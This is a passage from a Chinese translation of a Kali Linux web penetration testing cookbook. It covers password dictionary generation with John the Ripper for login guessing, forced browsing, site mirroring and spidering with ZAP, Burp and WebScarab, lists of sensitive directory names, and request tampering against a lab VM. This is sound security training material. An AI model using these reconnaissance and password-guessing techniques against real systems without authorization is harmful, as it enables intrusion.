417 | 其它工具也可用于类似目的，它们中的一些生成基于规则或其它单词列表的单词列表，另一些可以爬取网站来寻找最常用的单词。
418 | 
419 | +   Crunch：这是基于由用户提供的字符集合的生成器。它使用这个集合来生成所有可能的组合。Crunch 包含在 Kali 中。
420 | 
421 | +   Wordlist Maker (WLM)：WLM 能够基于字符集来生成单词列表，也能够从文本文件和网页中提取单词（<http://www.pentestplus.co.uk/wlm.htm>）。
422 | 
423 | +   Common User Password Profiler (CUPP)：这个工具可以使用单词列表来为常见的用户名分析可能的密码，以及从数据库下载单词列表和默认密码（<https://github.com/Mebus/cupp>）。
424 | 
425 | ## 2.9 使用 John the Ripper 生成字典
426 | 
427 | John the Ripper 可能是世界上最受大多数渗透测试者和黑客欢迎的密码破解器。他拥有许多特性，例如自动化识别常见加密和哈希算法，使用字典，以及爆破攻击。因此，它允许我们对字典的单词使用规则、修改它们、以及在爆破中使用更丰富的单词列表而不用储存列表。最后这个特性是我们会在这个秘籍中使用的特性之一，用于基于极其简单的单词列表生成扩展字典。
428 | 
429 | ### 准备
430 | 
431 | 我们会使用上一节中生成的单词列表，来生成可能密码的字典。
432 | 
433 | ### 操作步骤
434 | 
435 | 1.  John拥有只展示用于破解特定密码文件的密码的选项。让我们使用我们的单词列表来尝试它：
436 | 
437 |     ```
438 |     john --stdout --wordlist=cewl_WackoPicko.txt
439 |     ```
440 |     
441 |     ![](img/2-9-1.jpg)
442 |     
443 | 2.  另一个 John 的特性是让我们使用规则，以多种方式来修改列表中的每个单词，以便生成更复杂的字典。
444 | 
445 |     ```
446 |     john --stdout --wordlist=cewl_WackoPicko.txt --rules
447 |     ```
448 |     
449 |     你可以在结果中看到，John 通过转换大小写、添加后缀和前缀，以及将字母替换为数字和符号（leetspeak）来修改单词。
450 |     
451 | 3.  现在我们需要执行相同操作，但是将列表发送给文件，便于我们之后使用：
452 | 
453 |     ```
454 |     john --stdout --wordlist=cewl_WackoPicko.txt --rules > dict_ WackoPicko.txt
455 |     ```
456 |     
457 |     ![](img/2-9-2.jpg)
458 |     
459 | 4.  现在，我们拥有了 999 个单词的字典，它会在之后使用，用于进行应用登录页面上的密码猜测攻击。
460 | 
461 | ### 工作原理
462 | 
463 | 虽然 John the Ripper 的目标并不是字典生成器，而是高效地使用单词列表来破解密码（它也做的非常好）。它的特性允许我们将其用于扩展现有单词列表，并创建更符合现代用户所使用的密码的字典。
464 | 
465 | 这个秘籍中，我们使用了默认的规则集合来修改我们的单词。John 的规则定义在配置文件中，位于 Kali 的`/etc/john/john.conf`。
466 | 
467 | ### 更多
468 | 
469 | 有关为 John the Ripper创建和修改规则的更多信息，请见：<http://www.openwall.com/john/doc/RULES.shtml>。
470 | 
471 | ## 2.10 使用 ZAP 发现文件和文件夹
472 | 
473 | OWASP ZAP（Zed Attack Proxy）是个用于 Web 安全测试的全能工具。他拥有代理、被动和主动漏洞扫描器、模糊测试器、爬虫、HTTP 请求发送器，一起一些其他的有趣特性。这个秘籍中，我们会使用最新添加的“强制浏览”，它是 ZAP 内的 DisBuster 实现。
474 | 
475 | ### 准备
476 | 
477 | 这个秘籍中，我们需要将 ZAP 用做浏览器的代理。
478 | 
479 | 1.  打开 OWASP ZAP，从应用的菜单栏中，访问`Applications | Kali Linux | Web Applications | Web Application Fuzzers | owasp-zap`。
480 | 
481 | 2.  在 Mantra 或 Iceweasel 中，访问主菜单的` Preferences | Advanced | Network`，在`Connection`中点击`Settings`。
482 | 
483 | 3.  选项`Manual proxy configuration`（手动代理配置），并将`127.0.0.1`设置为 HTTP 代理，8080 设置为端口。检查选项来为所有协议使用同一个代理，并点击`OK`。
484 | 
485 |     ![](img/2-10-1.jpg)
486 |     
487 | 4.  现在，我们需要告诉 ZAP 从哪个文件获得目录名称。从 ZAP 的菜单中访问` Tools | Options | Forced Brows`，之后点击`Select File`。
488 | 
489 | 5.  Kali 包含一些单词列表，我们会使用它们之一：选择文件`/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3small.txt`，之后点击`Open`。
490 | 
491 |     ![](img/2-10-2.jpg)
492 |     
493 | 6.  提示框会告诉我们文件被加载了。点击`OK`之后再点击`OK`来离开`Options`对话框。
494 | 
495 | ### 操作步骤
496 | 
497 | 1.  合理配置代理之后，浏览 <http://192.168.56.102/ WackoPicko>。
498 | 
499 | 2.  我们会看到 ZAP 通过显示我们刚刚访问的主机的树形结构，对这个行为作出反应。
500 | 
501 |     ![](img/2-10-3.jpg)
502 |     
503 | 3.  现在，在 ZAP 的左上方面板中（`Sites`标签页），右击` http://192.168.56.102 `站点下面的`WackoPicko `文件夹。之后在上下文菜单中，访问`Attack | Forced Browse directory`。
504 | 
505 |     ![](img/2-10-4.jpg)
506 |     
507 | 4.  在底部的面板中，我们会看到显示了` Forced Browse`标签页。这里我们可以看到扫描的过程和结果。
508 | 
509 |     ![](img/2-10-5.jpg)
510 | 
511 | ### 工作原理
512 | 
513 | 当我们配置浏览器来将 ZAP 用作代理的时候，它并不直接发送给服务器任何我们打算浏览的页面的请求，而是发到我们定义的地址。这里是 ZAP 监听的地址。之后 ZAP 将请求转发给服务器但是不分析任何我们发送的信息。
514 | 
515 | ZAP 的强制浏览的工作方式和 DIrBuster 相同，它接受我们所配置的字典，并向服务器发送请求，就像它尝试浏览列表中的文件那样。如果文件存在，服务器会相应地响应。如果文件不存在或不能被我们的当前用户访问，服务器会返回错误。
516 | 
517 | ### 另见
518 | 
519 | Kali 中包含的另一个非常实用的代理是 Burp Suite。它也拥有一些特别有趣的特性。其中可用作强制浏览的替代品是 Intruder。虽然 Burp Suite 并不特地用于该目的，但是它是个值得研究的通用工具。
520 | 


--------------------------------------------------------------------------------
/ch3.md:
--------------------------------------------------------------------------------
  1 | # 第三章 爬虫和蜘蛛
  2 | 
  3 | > 作者：Gilberto Najera-Gutierrez
  4 | 
  5 | > 译者：[飞龙](https://github.com/)
  6 | 
  7 | > 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
  8 | 
  9 | ## 简介
 10 | 
 11 | 渗透测试可以通过多种途径完成，例如黑盒、灰盒和白盒。黑盒测试在测试者没有任何应用的前置信息条件下执行，除了服务器的 URL。白盒测试在测试者拥有目标的全部信息的条件下执行，例如它的构造、软件版本、测试用户、开发信息，以及其它。灰盒测试是黑盒和白盒的混合。
 12 | 
 13 | 对于黑盒和灰盒测试，侦查阶段对测试者非常必然，以便发现白盒测试中通常由应用所有者提供的信息。
 14 | 
 15 | 我们打算采取黑盒测试方式，因为它涉及到外部攻击者用于获取足够信息的所有步骤，以便入侵应用或服务器的特定功能。
 16 | 
 17 | 作为每个 Web 渗透测试中侦查阶段的一部分，我们需要浏览器每个包含在网页中的链接，并跟踪它展示的每个文件。有一些工具能够帮助我们自动和以及加速完成这个任务，它们叫做 Web 爬虫或蜘蛛。这些工具通过跟随所有到外部文件的链接和引用，有的时候会填充表单并将它们发送到服务器，保存所有请求和响应来浏览网页，从而提供给我们离线分析它们的机会。
 18 | 
 19 | 这一章中，我们会涉及到一些包含在 Kali 中的爬虫的使用，也会查看我们感兴趣的文件和目录，来寻找常见的网页。
 20 | 
 21 | ## 3.1 使用 Wget 为离线分析下载网页
 22 | 
 23 | Wget 是 GNU 项目的一部分，也包含在主流 linux 发行版中，包括 Kali。它能够递归为离线浏览下载网页，包括链接转换和下载非 HTML 文件。
 24 | 
 25 | 这个秘籍中，我们会使用 Wget 来下载和 vulnerable_vm 中的应用相关的页面。
 26 | 
 27 | ### 准备
 28 | 
 29 | 这一章的所有秘籍都需要运行 vulnerable_vm。在这本书的特定场景中，它的 IP 地址为 192.168.56.102。
 30 | 
 31 | ### 操作步骤
 32 | 
 33 | 1.  让我们做第一次尝试，通过仅仅以一个参数调用 Wget 来下载页面。
 34 | 
 35 |     ```
 36 |     wget http://192.168.56.102/bodgeit/
 37 |     ```
 38 |     
 39 |     ![](img/3-1-1.jpg)
 40 |     
 41 |     我们可以看到，它仅仅下载了`index.html`文件到当前目录，这是应用的首页。
 42 |     
 43 | 2.  我们需要使用一些选项，告诉 Wget 将所有下载的文件保存到特定目录中，并且复制我们设为参数的 URL 中包含的所有文件。让我们首先创建目录来保存这些文件：
 44 | 
 45 |     ```
 46 |     mkdir bodgeit_offline
 47 |     ```
 48 |     
 49 | 3.  现在，我们会递归下载应用中所有文件并保存到相应目录中。
 50 | 
 51 |     ```
 52 |     wget -r -P bodgeit_offline/ http://192.168.56.102/bodgeit/
 53 | 
 54 |     ```
 55 |     
 56 |     ![](img/3-1-2.jpg)
 57 |     
 58 | ### 工作原理
 59 | 
 60 | 像之前提到的那样，Wget 是个为下载 HTTP 内容创建的工具。通过`-r`参数，我们可以使其递归下载，这会按照它所下载的每个页面的所有连接，并同样下载它们。`-P`选项允许我们设置目录前缀，这是 Wget 会开始保存下载内容的目录。默认它设为当前目录。
 61 | 
 62 | ### 更多
 63 | 
 64 | 在我们使用 Wget 时，可以考虑一些其它的实用选项：
 65 | 
 66 | +   `-l`：在递归下载的时候，规定 Wget 的遍历深度可能很有必要。这个选项后面带有我们想要遍历的层级深度的数值，让我们规定这样的界限。
 67 | 
 68 | +   `-k`：在文件下载之后，Wget 修改所有链接，使其指向相应的本地文件，这会使站点能够在本地浏览。
 69 | 
 70 | +   `-p`：这个选项让 Wget 下载页面所需的所有图像，即使它们位于其它站点。
 71 | 
 72 | +   `-w`：这个选项让 Wget 在两次下载之间等待指定的描述。当服务器中存在防止自动浏览的机制时，这会非常有用。
 73 | 
 74 | ## 3.2 使用 HTTrack 为离线分析下载页面
 75 | 
 76 | 就像 HTTrack 的官网所说（`http://www.httrack.com`）：
 77 | 
 78 | > 它允许你从互联网下载 WWW 站点到本地目录中，递归构建所有目录、从服务器获得 HTML、图像，和其它文件到你的计算机中。
 79 | 
 80 | 我们在这个秘籍中会使用 HTTrack 来下载应用站点的所有内容。
 81 | 
 82 | ### 准备
 83 | 
 84 | HTTrack 没有默认在 Kali 中安装。所以我们需要安装它。
 85 | 
 86 | ```
 87 | apt-get update 
 88 | apt-get install httrack
 89 | ```
 90 | 
 91 | ### 操作步骤
 92 | 
 93 | 1.  我们的第一步是创建目录来储存下载的站点，输入：
 94 | 
 95 |     ```
 96 |     mkdir bodgeit_httrack 
 97 |     cd bodgeit_httrack
 98 |     ```
 99 |     
100 | 2.  使用 HTTrack 的最简单方式就是向命令中添加我们打算下载的 URL。
101 | 
102 |     ```
103 |     httrack http://192.168.56.102/bodgeit/ 
104 |     ```
105 |     
106 |     设置最后的`/`非常重要，如果遗漏了的话，HTTrack 会返回 404 错误，因为服务器根目录没有`bodgeit`文件。
107 |     
108 |     ![](img/3-2-1.jpg)
109 |     
110 | 3.  现在，如果我们访问文件` file:///root/MyCookbook/test/bodgeit_httrack/index. html`（或者你在你的测试环境中选择的目录），我们会看到，我们可以离线浏览整个站点：
111 | 
112 |     ![](img/3-2-2.jpg)
113 |     
114 | ### 工作原理
115 | 
116 | HTTrack 创建站点的完整静态副本，这意味着所有动态内容，例如用户输入的响应，都不会有效。在我们下载站点的文件夹中，我们可以看到下列文件和目录：
117 | 
118 | +   以服务器名称或地址命名的目录，包含所有下载的文件。
119 | 
120 | +   `cookies.txt`文件，包含用于下载站点的 cookie 信息。
121 | 
122 | +   `hts-cache`目录包含由爬虫检测到的文件列表，这是 httrack 所处理的文件列表。
123 | 
124 | +   `hts-log.txt `文件包含错误、警告和其它在爬取或下载站点期间的信息
125 | 
126 | +   ` index.html`文件重定向到副本的原始主页，它位于名称为服务器的目录中。
127 | 
128 | ### 更多
129 | 
130 | HTTrack 也拥有一些扩展选项，允许我们自定义它的行为来更好符合我们的需求。下面是一些值得考虑的实用修改器：
131 | 
132 | +   `-rN`：将爬取的链接深度设置为 N。
133 | +   `-%eN`：设置外部链接的深度界限。
134 | +   `+[pattern]`：告诉 HTTrack 将匹配`[pattern]`的 URL 加入白名单，例如`+*google.com/*`。
135 | +   `-[pattern]`：告诉 HTTrack 将匹配`[pattern]`的 URL 加入黑名单。
136 | +   `-F [user-agent]`：允许我们定义用于下载站点的 UA（浏览器标识符）。
137 | 
138 | ## 3.3 使用 ZAP 蜘蛛
139 | 
140 | 在我们的计算机中将完整的站点下载到目录给予我们信息的静态副本，这意味着我们拥有了不同请求产生的输出，但是我们没有服务器的请求或响应状态。为了拥有这种信息的记录，我们需要使用蜘蛛，就像 OWASP ZAP 中集成的这个。
141 | 
142 | 这个秘籍中，我们会使用 ZAP 的蜘蛛来爬取 vulnerable_vm 中的目录，并检查捕获的信息。
143 | 
144 | ### 准备
145 | 
146 | 对于这个秘籍，我们需要启动  vulnerable_vm 和 OWASP ZAP，浏览器需要配置来将 ZAP 用做代理。这可以通过遵循上一章中“使用 ZAP 发现文件和文件夹”中的指南来完成。
147 | 
148 | ### 操作步骤
149 | 
150 | 1.  为了让 ZAP 启动并使浏览器将其用作代理，浏览`http://192.168.56.102/bodgeit/`。
151 | 
152 | 2.  在`Sites`标签页中，打开对应测试站点的文件夹（本书中是`http://192.168.56.102`）。
153 | 
154 | 3.  右击`GET:bodgeit`。
155 | 
156 | 4.  从下拉菜单中选择` Attack | Spider…`。
157 | 
158 |     ![](img/3-3-1.jpg)
159 | 
160 | 5.  在对话框中，保留所有选项为默认并点击`Start Scan`。
161 | 
162 | 6.  结果会出现在`Spider`标签页的底部面板中。
163 | 
164 |     ![](img/3-3-2.jpg)
165 | 
166 | 7.  如果我们打算分析独立文件的请求和响应，我们访问`Sites`标签并打开其中的`site`文件夹和`bodget`文件夹。让我们看一看`POST:contact.jsp(anticsrf,comments,null)`。
167 | 
168 |     ![](img/3-3-3.jpg)
169 |     
170 |     在右边，我们可以看到完整的请求，包含所使用的参数（下半边）。
171 |     
172 | 8.  现在，选择右侧部分的`Reponse`标签页。
173 | 
174 |     ![](img/3-3-4.jpg)
175 |     
176 |     在上半边中，我们可以看到响应头，包括服务器标识和会话 Cookie，在下版本我们拥有完整的 HTML 响应。在之后的章节中，我们会了解从已授权的用户获取这种 cookie，如何用于劫持用户会话以及执行冒充它们的操作。
177 |     
178 | ### 工作原理
179 | 
180 | 就像任何其它爬虫那样，ZAP 的蜘蛛跟随它找到的每个链接，位于每个包含请求范围以及其中的链接中的页面上。此外，蜘蛛会跟随表单响应、重定向和包含在`robots.txt `和`sitemap.xml`文件中的 URL。之后它会为之后分析和使用储存所有请求和响应、
181 | 
182 | ### 更多
183 | 
184 | 在爬取站点或目录之后，我们可能打算使用储存的请求来执行一些测试。使用 ZAP 的功能，我们能够执行下列事情：
185 | 
186 | +   在修改一些数据之后重放请求
187 | +   执行主动和被动漏洞扫描
188 | +   模糊测试输入参数来寻找可能的攻击向量
189 | +   在浏览器中重放特定请求
190 | 
191 | ## 3.4 使用 Burp Suite 爬取站点
192 | 
193 | Burp 几乎是最广泛用于应用渗透测试的工具，因为它拥有类似 ZAP 的功能，并含有一些独特的特性和易用的界面。Burp 不仅仅能够用于爬取站点，但是现在，作为侦查阶段的一部分，我们先涉及这个特性。
194 | 
195 | ### 准备
196 | 
197 | 通过访问 Kali 的`Applications `菜单，之后访问`03 Web Application Analysis | Web Application Proxies | burpsuite`来启动 Burp Suite，就像下面这样：
198 | 
199 |     ![](img/3-4-1.jpg)
200 |     
201 | 之后配置浏览器将其用做代理，通过 8080 端口，就像我们之前使用 ZAP 的那样。
202 | 
203 | ### 操作步骤
204 | 
205 | 1.  Burp 的代理默认配置为拦截所有请求，我们需要禁用它来不带拦截浏览。访问`Proxy`标签页并点击` Intercept is on `按钮，它就会变为`Intercept is off`，像这样：
206 | 
207 |     ![](img/3-4-2.jpg)
208 |     
209 | 2.  现在，在浏览器中，访问` http://192.168.56.102/bodgeit/`。
210 | 
211 | 3.  在 Burp 的窗口中，当我们访问`Target`的时候，我们会看到其中含有我们正在浏览器的站点信息，以及浏览器产生的请求。
212 | 
213 |     ![](img/3-4-3.jpg)
214 |     
215 | 4.  现在，为了激活蜘蛛，我们右击`bodgeit `文件夹，并从菜单中选择`Spider this branch`。
216 | 
217 |     ![](img/3-4-4.jpg)
218 | 
219 | 5.  Burp 会询问我们是否添加项目到这里，我们点击`Yes`。通常，Burp 的蜘蛛只爬取匹配定义在`Target `标签页中的`Scope`标签页中的模式的项目。
220 | 
221 | 6.  之后，蜘蛛会开始运行。当它检测到登录表单之后，它会向我们询问登录凭据。我们可以忽略它，蜘蛛会继续，或者我们可以提交一些测试值，蜘蛛会填充这些值到表单中。让我们将两个字段，用户名和密码都填充为单词`test`，并点击`Submit form`：
222 | 
223 |     ![](img/3-4-5.jpg)
224 |     
225 | 7.  下面，我们会要求在注册页中填充用户名和密码。我们通过点击`Ignore form`来忽略它。
226 | 
227 | 8.  我们可以在`Spider`标签页中检查蜘蛛的状态。我们也可以通过点击` Spider is running `按钮来停止它。让我们现在停止它，像这样：
228 | 
229 |     ![](img/3-4-6.jpg)
230 |     
231 | 9.  我们可以在`Site map`标签页中检查蜘蛛生成的结果，它在`Target`中。让我们查看我们之前填充的登录请求：
232 | 
233 |     ![](img/3-4-7.jpg)
234 |     
235 | ### 工作原理
236 | 
237 | Burp 的蜘蛛遵循和其它蜘蛛相同的方式，但是它的行为有一些不同，我们可以让它在我们浏览站点的时候运行，它会添加我们跟随（匹配范围定义）的链接到爬取队列中。
238 | 
239 | 就像 ZAP 那样，我们可以使用 Burp 的爬取结果来执行任何操作。我们可以执行任何请求，例如扫描（如果我们拥有付费版）、重放、比较、模糊测试、在浏览器中查看，以及其它。
240 | 
241 | ## 3.5 使用 Burp 重放器重放请求
242 | 
243 | 在分析蜘蛛的结果以及测试可能的表单输入时，发送相同请求的修改特定值的不同版本可能很实用。
244 | 
245 | 这个秘籍中，我们会学到如何使用 Burp 的重放器来多次发送带有不同值的请求。
246 | 
247 | ### 准备
248 | 
249 | 我们从前一个秘籍的地方开始这个秘籍。启动 vulnerable_vm 虚拟机和 Burp 以及将浏览器合理配置来将 Burp 用做代理非常必要。
250 | 
251 | ### 操作步骤
252 | 
253 | 1.  我们的第一步是访问`Target`标签，之后访问蜘蛛所生成的登录页面请求（`http://192.168.56.102/bodgeit/login.jsp`），带有`username=test&password=test`的那个。
254 | 
255 | 2.  右击请求并从菜单中选择`Send to Repeater`，像这样：
256 | 
257 |     ![](img/3-5-1.jpg)
258 |     
259 | 3.  现在我们切换到`Repeater`标签页。
260 | 
261 | 4.  让我们点击`Go`来在右侧查看服务器的响应。
262 | 
263 |     ![](img/3-5-2.jpg)
264 |     
265 |     在`Request`部分（图像左侧）中，我们可以看到发给服务器的原始请求。第一行展示了所使用的方法：POST，被请求的 URL 和协议：HTTP 1.1。下面一行，一直到 Cookie，都是协议头参数，在它们后面我们看到一个换行，之后是我们在表单输入的 POST 参数和值。
266 |     
267 | 5.  在响应部分我们看到了一些标签页：`Raw`、`Headers`、`Hex`、`HTML`和`Render`。这些以不同形式展示相同的响应信息。让我们点击`Render`来查看页面，就像在浏览器中那样：
268 | 
269 |     ![](img/3-5-3.jpg)
270 |     
271 | 6.  我们可以在请求端修改任何信息。再次点击`OK`并检查新的响应。对于测试目的，让我们将密码值替换为一个单引号，并发送请求。
272 | 
273 |     ![](img/3-5-4.jpg)
274 |     
275 |     我们可以看到，我们通过修改输入变量的值触发了系统错误。这可能表明应用中存在漏洞。在后面的章节中，我们会涉及到漏洞的测试和识别，并深入探索它。
276 |     
277 | ### 工作原理
278 | 
279 | Burp 的重放器允许我们手动为相同的 HTTP 请求测试不同的输入和场景，并且分析服务器提供的响应。这在测试漏洞的时候非常实用，因为测试者可以了解应用如何对多种所提供的输入反应，以及从而识别或利用设计、编程或配置中的可能缺陷。
280 | 
281 | ## 3.6 使用 WebScarab
282 | 
283 | WebScarab 是另一个 Web 代理，拥有让渗透测试者感兴趣的特性。这个秘籍中，我们会使用它来爬取网站。
284 | 
285 | ### 准备
286 | 
287 | 作为默认配置，WebScarab 实用 8008 端口来捕获 HTTP 请求。所以我们需要配置我们的浏览器来在 localhost 中使用这个端口作为代理。你需要遵循与在浏览器中配置 OWASP ZAP、Burp Suite 的相似步骤。这里，端口必须是 8008。
288 | 
289 | ### 操作步骤
290 | 
291 | 1.  在 Kali 的`Applications `菜单中，访问` 03 Web Application Analysis | webscarab`来打开WebScarab。
292 | 
293 | 2.  浏览vulnerable_vm 的 Bodgeit 应用（`http://192.168.56.102/ bodgeit/`）。我们会看到它出现在 WebScarab 的`Summary`标签页中。
294 | 
295 | 3.  现在，右击 bodgeit 文件夹并从菜单选择` Spider tree `，像这样：
296 | 
297 |     ![](img/3-6-1.jpg)
298 |     
299 | 4.  在蜘蛛发现新文件过程中，所有请求会出现在概览的下半部分，树也会被填满。
300 | 
301 |     ![](img/3-6-2.jpg)
302 |     
303 |     这个概览也展示了一些关于每个特定文件的相关信息。例如，是否存在注入或者可能为注入的漏洞，是否设置了 cookie，包含表单，或者是否表单含有隐藏字段。它也表明了代码或文件上传中存在注释。
304 |     
305 | 5.  如果我们右击任何下半部分的请求，我们会看到可以对它们执行的操作。我们分析请求，找到路径`/bodgeit/search.jsp`，右击它，并选择Show conversation`。新的窗口会弹出，并以多种格式展示响应和请求，就像下面这样：
306 | 
307 |     ![](img/3-6-3.jpg)
308 |     
309 | 6.  现在点击`Spider`标签页。
310 | 
311 |     ![](img/3-6-4.jpg)
312 |     
313 |     这个标签页中，我们可以在` Allowed Domains` 和 `Forbidden Domains`中，使用正则表达式来调整蜘蛛抓取的内容。我们也可以使用`Fetch Tree`来刷新结果。我们也可以通过点击`Stop`按钮来停止蜘蛛。
314 |     
315 | ### 工作原理
316 | 
317 | WebScarab 的蜘蛛类似于 ZAP 或者 Burp Suite，对发现网站中所有被引用文件或目录，而无需手动浏览器所有可能的链接，以及深度分析发给服务器的请求，并使用它们执行更多复杂的测试非常实用。
318 | 
319 | ## 3.7 从爬取结果中识别相关文件和目录
320 | 
321 | 我们已经爬取了应用的完整目录，并且拥有了被引用文件和目录的完整列表。下一步地然是识别这些文件哪个包含相关信息，或者是更可能发现漏洞的机会。
322 | 
323 | 这篇不仅仅是个秘籍，更是用于文件和目录的常见名称、前后缀的总结，它们通常给渗透测试者提供有价值的信息，或者是可能导致整个系统沦陷的漏洞利用。
324 | 
325 | ### 操作步骤
326 | 
327 | 1.  首先，我们打算寻找登录和注册页面，它们可以给我们机会来成为应用的正常用户，或者通过猜测用户名和密码来冒充它们。一些名称和部分名称的例子是：
328 | 
329 |     +   Account 
330 |     +   Auth 
331 |     +   Login 
332 |     +   Logon 
333 |     +   Registration 
334 |     +   Register 
335 |     +   Signup 
336 |     +   Signin
337 |     
338 | 2.  另一个常见的用户名、密码来源和与之相关的漏洞是密码恢复页面：
339 | 
340 |     +   Change 
341 |     +   Forgot 
342 |     +   lost-password 
343 |     +   Password 
344 |     +   Recover 
345 |     +   Reset
346 |     
347 | 3.  下面，我们需要识别是否存在应用的管理员部分，这里有一组功能可能允许我们执行高权限的操作，例如：
348 | 
349 |     +   Admin 
350 |     +   Config 
351 |     +   Manager 
352 |     +   Root
353 |     
354 | 4.  其它有趣的目录是内容管理系统（CMS）的管理员、数据库或应用服务器之一，例如：
355 | 
356 |     +   Admin-console 
357 |     +   Adminer 
358 |     +   Administrator 
359 |     +   Couch 
360 |     +   Manager 
361 |     +   Mylittleadmin 
362 |     +   PhpMyAdmin 
363 |     +   SqlWebAdmin 
364 |     +   Wp-admin
365 |     
366 | 5.  应用的测试和开发版通常没有保护，并且比最终发行版更容易存在漏洞，所以它们在我们搜索缺陷的时候是个很好的目标。这些目录的名称包含：
367 | 
368 |     +   Alpha 
369 |     +   Beta 
370 |     +   Dev 
371 |     +   Development 
372 |     +   QA 
373 |     +   Test
374 |     
375 | 6.  Web 服务器的信息和配置文件如下：
376 | 
377 |     +   config.xml 
378 |     +   info 
379 |     +   phpinfo 
380 |     +   server-status 
381 |     +   web.config
382 |     
383 | 7.  此外，所有在` robots.txt `中标记为`Disallow `的目录和文件可能非常实用。
384 | 
385 | ### 工作原理
386 | 
387 | 一些前面列出的名称和它们的语言变体允许我们访问站点的首先部分，这是渗透测试中非常重要的步骤。它们中的一些能够提供给我们服务器，它的配置以及所使用的开发框架信息。其它的，例如 Tomcat 管理器和 JBoss 的登录页面，如果配置不当的话，会让我们（或恶意攻击者）获得服务器的控制。
388 | 


--------------------------------------------------------------------------------
/ch4.md:
--------------------------------------------------------------------------------
  1 | # 第四章 漏洞发现
  2 | 
  3 | > 作者：Gilberto Najera-Gutierrez
  4 | 
  5 | > 译者：[飞龙](https://github.com/)
  6 | 
  7 | > 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
  8 | 
  9 | ## 简介
 10 | 
 11 | 我们现在已经完成了渗透测试的侦查阶段，并且识别了应用所使用的服务器和开发框架的类型，以及一些可能的弱点。现在是实际测试应用以及检测它的漏洞的时候了。
 12 | 
 13 | 这一章中，我们会涉及到检测一些 Web 应用中常见漏洞的过程，以及允许我们发现和利用它们的工具。
 14 | 
 15 | 我们也会用到 vulnerable_vm 中的应用，我们会使用 OWASP Mantra 作为浏览来执行这些测试。
 16 | 
 17 | ## 4.1 使用 Hackbar 插件来简化参数分析
 18 | 
 19 | 在测试 Web 应用时，我们需要和浏览器的地址栏交互，添加或修改参数，以及修改 URL。一些服务器的相应会包含重定向，刷新以及参数修改。所有这些改动都会使对相同变量尝试不同值的操作非常费时间。我们需要一些工具来使它们不那么混乱。
 20 | 
 21 | Hackbar 是 Firefox 插件，它的行为就像地址栏，但是不受由服务器响应造成的重定向或其它修改影响，这就是我们需要测试 Web 应用的原因。
 22 | 
 23 | 这个秘籍中，我们会使用 Hackbar 来简化相同请求的不同版本的发送工作。
 24 | 
 25 | ### 准备
 26 | 
 27 | 如果你没有使用  OWASP Mantra，你需要在你的 Firefox 上安装 Hackbar。
 28 | 
 29 | ### 操作步骤
 30 | 
 31 | 1.  访问 DVWA 并且登录。默认的用户名/密码组合是`admin/admin`。
 32 | 
 33 | 2.  在左侧的菜单上选择`SQL Injection`（SQL 注入）。
 34 | 
 35 |     ![](img/4-1-1.jpg)
 36 |     
 37 | 3.  在` User ID `输入框中输入数字，并点击`Submit`（提交）。
 38 | 
 39 |     现在我们可以按下`F9`或者点击图标来显示 Hackbar。
 40 |     
 41 |     ![](img/4-1-2.jpg)
 42 |     
 43 |     Hackbar 会赋值 URL 及其参数。我们也可以开启修改 POST 请求和 Referer 参数的选项。后者告诉服务器页面从哪里被请求。
 44 |     
 45 | 4.  让我们做个简单的改动，将`id`参数值从`1`改成`2`，并点击`Execute`（执行）或者使用` Alt + X`快捷键。
 46 | 
 47 |     ![](img/4-1-3.jpg)
 48 |     
 49 |     我们可以看到，参数`id`对应页面上的文本框，所以，我们可以使用 Hackbar 修改`id`来尝试任何值，而不需要修改文本框中的`User ID`并提交它。在测试拥有许多输入的表单，或者取决于输入重定向到其它页面的表单时，这非常便利。
 50 |     
 51 | 5.  我们可以将一个有效值替换为另一个，但是如果我们输入了一个无效值作为`id`，会发生什么呢？尝试将单引号作为`id`：
 52 | 
 53 |     ![](img/4-1-4.jpg)
 54 |     
 55 |     通过输入应用非预期的字符，我们触发了一个错误，这在之后测试一些漏洞的时候非常有用。
 56 |     
 57 | ### 工作原理
 58 | 
 59 | Hackbar 是带有一些实用特性的第二个地址栏，比如不受 URL 重定向影响，并且允许我们修改 POST 参数。
 60 | 
 61 | 此外，Hackbar 可用于向我们的请求中添加 SQL 注入或跨站脚本代码段，以及哈希、加密和编码我们的输入。我们会在这一章后面的秘籍中深入探索 SQL 注入、跨站脚本，以及其他漏洞。
 62 | 
 63 | ## 4.2 使用 Tamper Data 插件拦截或修改请求
 64 | 
 65 | 有时候，应用拥有客户端的输入校验机制，它们通过 JavaScript，隐藏表单或者 POST 数据，并不能直接在地址栏中了解或看到。为了测试这些以及其它类型的变量，我们需要拦截浏览器发送的请求并且在它们到达服务器之前修改它们。这个秘籍中，我们会使用叫做 Tamper Data 的 Firefox 插件来拦截表单提交并且在它离开计算机之前修改一些值。
 66 | 
 67 | ### 操作步骤
 68 | 
 69 | 1.  从 Mantra 的菜单中访问 `Tools | Application Auditing | Tamper Data`。
 70 | 
 71 |     ![](img/4-2-1.jpg)
 72 |     
 73 | 2.  会出现 Tamper Data 的窗口。现在，让我们浏览 < http://192.168.56.102/dvwa/login.php>。我们可以在插件中看到请求会话。
 74 | 
 75 |     ![](img/4-2-2.jpg)
 76 |     
 77 |     > 每个浏览器产生的请求都会在活动时经过 Tamper Data。
 78 |     
 79 | 3.  为了拦截请求并修改它的值，我们需要通过点击`Start  Tamper`来启动 Tamper。现在启动 Tamper。
 80 | 
 81 | 4.  输入一些伪造的用户名密码组合。例如，` test/password`，之后点击`Login`。
 82 | 
 83 | 5.  在确认框中，取消勾选` Continue Tampering?`并点击`Tamper`。`Tamper Popup`窗口会出现。
 84 | 
 85 | 6.  在弹出窗口中，我们可以修改发送给服务器的信息，包括请求头和 POST 参数。将`username`和`password`改为正确的（`admin/admin`），之后点击`OK`。这应该在本书中使用，而不是 DVWA：
 86 | 
 87 |     ![](img/4-2-3.jpg)
 88 |     
 89 |     在最后一步中，我们在表单中的值由浏览器发送给服务器之前修改了它们。因此，我们可以以正确的凭证而不是错误的凭证登录服务器。
 90 |     
 91 | ### 工作原理
 92 | 
 93 | Tamper Data 会在请求离开浏览器之前捕获请求，并提供给我们时间来修改它包含的任何变量。但是，它也有一些限制，例如不能编辑 URL 或 GET 参数。
 94 | 
 95 | ## 4.3 使用 ZAP 来查看和修改请求
 96 | 
 97 | 虽然 Tamper Data 有助于测试过程，有时我们需要更灵活的方法来修改请求以及更多特性，例如修改用于发送它们的方法（即从 GET 改为 POST），或者使用其它工具为进一步的目的保存请求/响应对。
 98 | 
